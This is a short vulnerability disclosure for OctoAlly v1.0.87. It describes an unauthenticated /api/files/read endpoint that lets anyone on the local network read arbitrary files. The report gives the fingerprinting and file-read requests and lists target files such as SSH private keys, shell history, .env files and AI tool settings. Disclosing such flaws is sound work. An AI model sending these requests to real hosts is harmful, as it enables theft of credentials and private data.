| Title | https://github.com/ai-genius-automations octoally v1.0.87 Local Sensitive Logic Exposure to Arbitrary File Read |
|---|
| Description | In a default deployment, the OctoAlly backend listens on ::, making the service reachable from other hosts on the local network.
An attacker can first access:
GET /api/health
The response includes:
{
"name": "octoally",
"version": "1.0.87"
}
This allows the attacker to confirm that the target machine is running OctoAlly.
After confirming that the service exists, the attacker can call:
GET /api/files/read?path=/arbitrary/file/path
Without any credentials, the attacker can read files accessible to the OctoAlly server process.
The endpoint returns the file contents as UTF-8 text. Examples of readable files include:
/etc/hosts
/Users/xxx/.ssh/id_rsa
/Users/xxx/.zsh_history
/Users/xxx/.config/config.json
/Users/xxx/.claude/settings.json
/Users/xxx/project/.env
Any file readable by the service process can be retrieved.
